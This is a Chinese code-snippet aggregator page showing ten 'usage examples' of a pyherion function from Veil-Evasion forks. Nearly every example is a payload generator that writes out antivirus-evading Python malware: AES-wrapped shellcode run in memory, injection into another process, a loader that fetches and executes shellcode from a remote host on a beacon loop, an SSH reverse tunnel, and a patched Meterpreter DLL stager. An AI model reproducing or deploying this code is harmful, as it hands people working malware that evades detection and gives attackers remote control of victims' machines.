• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

Python encryption.pyherion函数代码示例

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

本文整理汇总了Python中modules.common.encryption.pyherion函数的典型用法代码示例。如果您正苦于以下问题:Python pyherion函数的具体用法?Python pyherion怎么用?Python pyherion使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。



在下文中一共展示了pyherion函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。

示例1: generate

    def generate(self):
        
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        
        # build our your payload sourcecode
        PayloadCode = "..."

        # add in a randomized string
        PayloadCode += helpers.randomString()
        
        # example of how to check the internal options
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        # return everything
        return PayloadCode
开发者ID:0x0mar,项目名称:Veil-Evasion,代码行数:17,代码来源:template.py


示例2: generate

    def generate(self):
        self._validateArchitecture()

        PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]

        try:
            # read in the python source
            f = open(PYTHON_SOURCE, 'r')
            PayloadCode = f.read()
            f.close()
        except IOError:
            print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
            return ""

        # example of how to check the internal options
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        # return everything
        return PayloadCode
开发者ID:AliBawazeEer,项目名称:Veil-Evasion,代码行数:20,代码来源:pyinstaller_wrapper.py


示例3: generate

    def generate(self):
        self._validateArchitecture()

        python_source = self.required_options["python_source"][0]
        
        try:
            # read in the python source
            f = open(python_source, 'r')
            PayloadCode = f.read()
            f.close()
        except IOError:
            print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
            return ""

        # example of how to check the internal options
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        # return everything
        return PayloadCode
开发者ID:AlTune,项目名称:Veil-Evasion,代码行数:20,代码来源:pyinstaller_wrapper.py


示例4: generate

    def generate(self):
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = "import ctypes\n"
                PayloadCode += "from Crypto.Cipher import AES\n"
                PayloadCode += "import base64\n"
                PayloadCode += "import os\n"
                PayloadCode += RandPadding + " = '{'\n"
                PayloadCode += (
                    RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
                )
                PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
                PayloadCode += (
                    RandDecodedShellcode
                    + " = "
                    + RandDecodeAES
                    + "("
                    + RandCipherObject
                    + ", '"
                    + EncodedShellcode
                    + "')\n"
                )
                PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += (
                    RandPtr
                    + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                    + RandShellCode
                    + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
                )
                PayloadCode += (
                    RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n"
                )
                PayloadCode += (
                    "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",ctypes.c_int(len("
                    + RandShellCode
                    + ")))\n"
                )
                PayloadCode += (
                    RandHt
                    + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                    + RandPtr
                    + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
                )
                PayloadCode += (
                    "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
                )

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

#.........这里部分代码省略.........
开发者ID:redbeardsec,项目名称:Veil,代码行数:101,代码来源:aes_encrypt.py


示例5: generate

    def generate(self):
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                pid_num_variable = helpers.randomString()
                pagerwx_variable = helpers.randomString()
                processall_variable = helpers.randomString()
                memcommit_variable = helpers.randomString()
                shell_length_variable = helpers.randomString()
                memalloc_variable = helpers.randomString()
                prochandle_variable = helpers.randomString()
                kernel32_variable = helpers.randomString()

                # Create Payload code
                PayloadCode = 'from ctypes import *\n\n'
                PayloadCode += pagerwx_variable + ' = 0x40\n'
                PayloadCode += processall_variable + ' = 0x1F0FFF\n'
                PayloadCode += memcommit_variable + ' = 0x00001000\n'
                PayloadCode += kernel32_variable + ' = windll.kernel32\n'
                PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
                PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
                PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
                PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
                PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
                PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
                PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                pid_num_variable = helpers.randomString()
                pagerwx_variable = helpers.randomString()
                processall_variable = helpers.randomString()
                memcommit_variable = helpers.randomString()
                shell_length_variable = helpers.randomString()
                memalloc_variable = helpers.randomString()
                prochandle_variable = helpers.randomString()
                kernel32_variable = helpers.randomString()

                # Create Payload code
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += pagerwx_variable + ' = 0x40\n'
                PayloadCode += processall_variable + ' = 0x1F0FFF\n'
                PayloadCode += memcommit_variable + ' = 0x00001000\n'
                PayloadCode += kernel32_variable + ' = windll.kernel32\n'
                PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
                PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
                PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
                PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
                PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
                PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
开发者ID:AliBawazeEer,项目名称:Veil-Evasion,代码行数:81,代码来源:pidinject.py


示例6: generate

    def generate(self):

        imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"

        inject_func = helpers.randomString()
        getexec_func = helpers.randomString()
        main_func = helpers.randomString()
        beaconthr_func = helpers.randomString()

        retry_var = helpers.randomString()
        if self.required_options["BEACON"][0].lower() == 'n':
            global_vars = "%s = False" % retry_var
        elif self.required_options["BEACON"][0].lower() == 'y':
            global_vars = "%s = True" % retry_var

        interval_var = helpers.randomString()
        opener_var = helpers.randomString()

        global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
        global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)

        shellcode_var = helpers.randomString()
        ptr_var = helpers.randomString()
        ht_var = helpers.randomString()
        buff_var = helpers.randomString()

        inject = "def %s(%s):" % (inject_func, shellcode_var)
        inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
        inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
        inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
        inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
        inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
        inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var

        url_var = helpers.randomString()
        shellcode_var = helpers.randomString()
        info_var = helpers.randomString()
        thread_var = helpers.randomString()
        thread_name = helpers.randomString()
        thread_name2 = helpers.randomString()

        getexec = "def %s(%s):" % (getexec_func, url_var)
        getexec += "\n\ttry:"
        getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
        getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
        getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
        getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
        getexec += "\n\texcept Exception:"
        getexec += "\n\t\tpass\n"

        url_var = helpers.randomString()

        beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
        beaconthr += "\n\twhile True:"
        beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
        beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
        beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
        beaconthr += "\n\t\t%s.start()\n" % thread_var

        main = "def %s():" % main_func
        main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
        main += "\n\tif %s is True:" % retry_var
        main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
        main += "\n\t\t%s.setDaemon(True)" % thread_var
        main += "\n\t\t%s.start()" % thread_var
        main += "\n\t%s(%s)" % (getexec_func, url_var)
        if self.required_options["BEACON"][0].lower() == 'y':
            main += "\n\twhile True:"
            main += "\n\t\ttime.sleep(0.1)"
        main += "\nif __name__ == '__main__':"
        main += "\n\t%s()" % main_func

        PayloadCode = imports + global_vars + inject + getexec + beaconthr + main

        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode
开发者ID:AliBawazeEer,项目名称:Veil-Evasion,代码行数:78,代码来源:download_inject.py


示例7: generate


#.........这里部分代码省略.........
import thread
import threading
import select

def inject(shellcode):
	ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
											  ctypes.c_int(len(shellcode)),
											  ctypes.c_int(0x3000),
											  ctypes.c_int(0x40))
	ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
									   ctypes.c_int(len(shellcode)))
	buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
	ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
										 buf,
										 ctypes.c_int(len(shellcode)))
	ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
											 ctypes.c_int(0),
											 ctypes.c_int(ptr),
											 ctypes.c_int(0),
											 ctypes.c_int(0),
											 ctypes.pointer(ctypes.c_int(0)))
	ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

def handler(chan, host, port):
	sock = socket()
	try:
		sock.connect((host, port))
	except Exception:
		pass
  
	while True:
		r, w, x = select.select([sock, chan], [], [])
		if sock in r:
			data = sock.recv(1024)
			if len(data) == 0:
				break
			chan.send(data)
		if chan in r:
			data = chan.recv(1024)
			if len(data) == 0:
				break
			sock.send(data)
	chan.close()
	sock.close()

def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):

		transport.request_port_forward('', server_port)
		while True:
				chan = transport.accept(1000)
				if chan is None:
						continue

				thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
				thr.setDaemon(True)
				thr.start()

def main(user,password, rhost, port, shellport):
	server = [rhost, int(port)]  
	remote = ['127.0.0.1', int(shellport)] 
	client = paramiko.SSHClient() 
	client.load_system_host_keys()
	client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

	try:
		client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password)
	except Exception:
		pass

	try:
		reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport())
	except Exception:
		pass

if __name__ == '__main__':
	multiprocessing.freeze_support()
	shellcode = r"%s"
	shellcode = shellcode.decode("string_escape")
	shellcode = bytearray(shellcode)
	shellport = "%s"
	time.sleep(2)
	p = multiprocessing.Process(target=inject, args=(shellcode,))
	jobs = []
	jobs.append(p)
	p.start()
	user = "%s"
	password = "%s"
	rhost = "%s"
	port = "%s"
	time.sleep(3)
	thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode,
																				 self.required_options["LPORT"][0],
																				 self.required_options["SSHUSER"][0],
																				 self.required_options["SSHPASS"][0],
																				 self.required_options["SSHOST"][0],
																				 self.required_options["SSHPORT"][0])
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = encryption.pyherion(PayloadCode)

		return PayloadCode
开发者ID:codercold,项目名称:Veil-Evasion,代码行数:101,代码来源:rev_ssh.py


示例8: generate

    def generate(self):

        payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"

        # randomize everything, yo'
        sumMethodName = helpers.randomString()
        checkinMethodName = helpers.randomString()

        randLettersName = helpers.randomString()
        randLetterSubName = helpers.randomString()
        randBaseName = helpers.randomString()

        downloadMethodName = helpers.randomString()
        hostName = helpers.randomString()
        portName = helpers.randomString()
        requestName = helpers.randomString()
        tName = helpers.randomString()

        injectMethodName = helpers.randomString()
        dataName = helpers.randomString()
        byteArrayName = helpers.randomString()
        ptrName = helpers.randomString()
        bufName = helpers.randomString()
        handleName = helpers.randomString()
        data2Name = helpers.randomString()
        proxy_var = helpers.randomString()
        opener_var = helpers.randomString()

        # helper method that returns the sum of all ord values in a string % 0x100
        payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)

        # method that generates a new checksum value for checkin to the meterpreter handler
        payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
        payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
        payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
        payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
        payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)

        # method that connects to a host/port over https and downloads the hosted data
        payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
        payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
        payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
        payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
        payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName)
        payloadCode += "\ttry:\n"
        payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName)
        payloadCode += "\t\ttry:\n"
        payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
        payloadCode += "\t\t\telse: return ''\n"
        payloadCode += "\t\texcept: return %s.read()\n" % (tName)
        payloadCode += "\texcept urllib2.URLError, e: return ''\n"

        # method to inject a reflective .dll into memory
        payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
        payloadCode += "\tif %s != \"\":\n" %(dataName)
        payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)

        # download the metpreter .dll and inject it
        payloadCode += "%s = ''\n" %(data2Name)
        payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
        payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)

        if self.required_options["USE_PYHERION"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
开发者ID:AliBawazeEer,项目名称:Veil-Evasion,代码行数:71,代码来源:rev_https.py


示例9: generate

    def generate(self):
        
        if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
        else:
            print "[*] Error: You either do not have the latest version of Metasploit or"
            print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
            print "[*] Error: Please fix either issue then select this payload again!"
            sys.exit()
            
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()
            
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        
        if self.required_options["use_pyherion"][0].lower() == "y":
#.........这里部分代码省略.........
开发者ID:PrinceXilo,项目名称:Veil-Evasion,代码行数:101,代码来源:rev_http_contained.py


示例10: generate

    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
        
                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
        
                # Create Payload code
